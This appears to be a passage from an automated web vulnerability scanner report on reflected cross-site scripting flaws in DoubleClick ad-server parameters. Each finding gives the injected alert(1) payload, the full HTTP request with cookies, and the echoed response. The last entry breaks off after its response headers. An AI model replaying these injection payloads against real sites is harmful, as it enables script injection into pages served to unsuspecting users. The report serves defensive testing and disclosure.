<!-- Code auto-generated on Thu Apr 28 10:42:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g22619"-alert(1)-"516c1086529&client=ca-pub-9674942009345807&adurl=http%3a%2f%2fhiltongardeninn.hilton.com/en/gi/promotions/hgi_aaafunbucks/index.jhtml%3FWT.mc_id%3DzkdCSAA0US1GI2DMH3Default4AAA7BR841270%26cssiteid%3D1004575%26csd
...[SNIP]...

5.68. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78cec"-alert(1)-"02ccfd40596 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L78cec"-alert(1)-"02ccfd40596&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=;ord=1935191738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:44:17 GMT
Content-Length: 7226

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Apr 28 10:42:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/188/%2a/y%3B240475400%3B0-0%3B0%3B63325726%3B3454-728/90%3B41899793/41917580/2%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L78cec"-alert(1)-"02ccfd40596&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4
...[SNIP]...

5.69. http://ad.doubleclick.net/adj/N2434.access/B5401633 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2434.access/B5401633

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2693'-alert(1)-'9a20c2c6224 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2434.access/B5401633;sz=b2693'-alert(1)-'9a20c2c6224 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=1029074125&tile=743041020&tug=&site=2&affiliate=20&hcent=892&scent=&pos=121&xpg=4294&sec=&au1=1&au2=1&uri=%2feye-health%2ftc%2fpinkeye-topic-overview&artid=091e9c5e8001e4a7&inst=0&leaf=1160&cc=16&tmg=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 50541
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:27:42 GMT
Expires: Wed, 11 May 2011 15:27:42 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
ttp://ad.doubleclick.net/activity;src=2691315;stragg=1;v=1;pid=62273654;aid=239402261;ko=0;cid=40271724;rid=40289511;rv=3;rn=6978095;";
this.swfParams = 'src=2691315&rv=3&rid=40289511&=b2693'-alert(1)-'9a20c2c6224&';
this.renderingId = "40289511";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

5.70. http://ad.doubleclick.net/adj/cardinals.mlb/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cardinals.mlb/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26910'-alert(1)-'f349f44d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cardinals.mlb/news;pageid=article;vkey=notebook_stl;pos=1;sz=728x90;tile=1;ord=889379305?&26910'-alert(1)-'f349f44d82=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://stlouis.cardinals.mlb.com/news/article.jsp?ymd=20110419&content_id=17985912&notebook_id=17993252&vkey=notebook_stl&c_id=stl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:36:37 GMT
Expires: Wed, 11 May 2011 15:41:37 GMT
Content-Length: 424

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/a;239857754;0-0;0;5695312;3454-728/90;41646731/41664518/1;;~okv=;pageid=article;vkey=notebook_stl;pos=1;sz=728x90;tile=1;;26910'-alert(1)-'f349f44d82=1;~aopt=2/1/ac/0;~sscs=%3fhttp://mlbnetwork.mlb.com/network/index.jsp">
...[SNIP]...

5.71. http://ad.doubleclick.net/adj/cardinals.mlb/news [pageid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cardinals.mlb/news

Issue detail

The value of the pageid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9026'%3balert(1)//65e97bef11b was submitted in the pageid parameter. This input was echoed as b9026';alert(1)//65e97bef11b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cardinals.mlb/news;pageid=b9026'%3balert(1)//65e97bef11b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://stlouis.cardinals.mlb.com/news/article.jsp?ymd=20110419&content_id=17985912&notebook_id=17993252&vkey=notebook_stl&c_id=stl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 381
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:35:25 GMT
Expires: Wed, 11 May 2011 15:40:25 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/i;197313047;0-0;0;5695312;4307-300/250;25584139/25601996/1;;~okv=;pageid=b9026';alert(1)//65e97bef11b;~aopt=2/1/ac/0;~sscs=%3fhttp://shop.mlb.com/giftCertificates/index.jsp">
...[SNIP]...

5.72. http://ad.doubleclick.net/adj/cm.starpulse/srb_jbl_042911 [net parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.starpulse/srb_jbl_042911

Issue detail

The value of the net request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37a35'%3balert(1)//afc6867632e was submitted in the net parameter. This input was echoed as 37a35';alert(1)//afc6867632e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.starpulse/srb_jbl_042911;net=37a35'%3balert(1)//afc6867632e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 296
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 14:58:24 GMT
Expires: Wed, 11 May 2011 14:58:24 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/r;44306;0-0;0;63470723;255-0/0;0/0/0;;~okv=;net=37a35';alert(1)//afc6867632e;~aopt=2/1/e4/0;~sscs=%3f"><img s
...[SNIP]...

5.73. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rmm.starpulse2/safescholarsus11_us_300x250vid

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ed33'-alert(1)-'e1ce3a9f88a was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/rmm.starpulse2/safescholarsus11_us_300x250vid;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=2ed33'-alert(1)-'e1ce3a9f88a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1350
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:50:35 GMT
Expires: Wed, 11 May 2011 15:50:35 GMT

document.write('<!-- Template ID = 12740 Template Name = !!! Image Banner - Open in New Window - RMM -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/7/1a5/%2a/k%3B238839690%3B0-0%3B0%3B
...[SNIP]...
2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=2ed33'-alert(1)-'e1ce3a9f88ahttp://www.safetyscholars.com\" target=\"_blank\">
...[SNIP]...

5.74. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rmm.starpulse2/safescholarsus11_us_300x250vid

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e4ad'-alert(1)-'3c06c5c5c48 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/rmm.starpulse2/safescholarsus11_us_300x250vid;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE5e4ad'-alert(1)-'3c06c5c5c48&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=;ord=1932777788? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:48:04 GMT
Content-Length: 1356

document.write('<!-- Template ID = 12740 Template Name = !!! Image Banner - Open in New Window - RMM -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/1a5/%2a/k%3B238839690%3B0-0%3B0%3B
...[SNIP]...
mIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE5e4ad'-alert(1)-'3c06c5c5c48&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=http%3a%2f%2fwww.safetyscholars.com\" target=\"_blank\">
...[SNIP]...

5.75. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rmm.starpulse2/safescholarsus11_us_300x250vid

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35498'-alert(1)-'1b1d99193ad was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/rmm.starpulse2/safescholarsus11_us_300x250vid;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-967494200934580735498'-alert(1)-'1b1d99193ad&adurl=;ord=1932777788? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:49:57 GMT
Content-Length: 1356

document.write('<!-- Template ID = 12740 Template Name = !!! Image Banner - Open in New Window - RMM -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/1a5/%2a/k%3B238839690%3B0-0%3B0%3B
...[SNIP]...
FycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-967494200934580735498'-alert(1)-'1b1d99193ad&adurl=http%3a%2f%2fwww.safetyscholars.com\" target=\"_blank\">
...[SNIP]...

5.76. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rmm.starpulse2/safescholarsus11_us_300x250vid

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20a31'-alert(1)-'897ff323ff0 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/rmm.starpulse2/safescholarsus11_us_300x250vid;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=020a31'-alert(1)-'897ff323ff0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=;ord=1932777788? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:48:41 GMT
Content-Length: 1356

document.write('<!-- Template ID = 12740 Template Name = !!! Image Banner - Open in New Window - RMM -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/1a5/%2a/k%3B238839690%3B0-0%3B0%3B
...[SNIP]...
sgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=020a31'-alert(1)-'897ff323ff0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=http%3a%2f%2fwww.safetyscholars.com\" target=\"_blank\">
...[SNIP]...

5.77. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rmm.starpulse2/safescholarsus11_us_300x250vid

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24bdb'-alert(1)-'1151e4da4b2 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/rmm.starpulse2/safescholarsus11_us_300x250vid;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ24bdb'-alert(1)-'1151e4da4b2&client=ca-pub-9674942009345807&adurl=;ord=1932777788? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:49:20 GMT
Content-Length: 1356

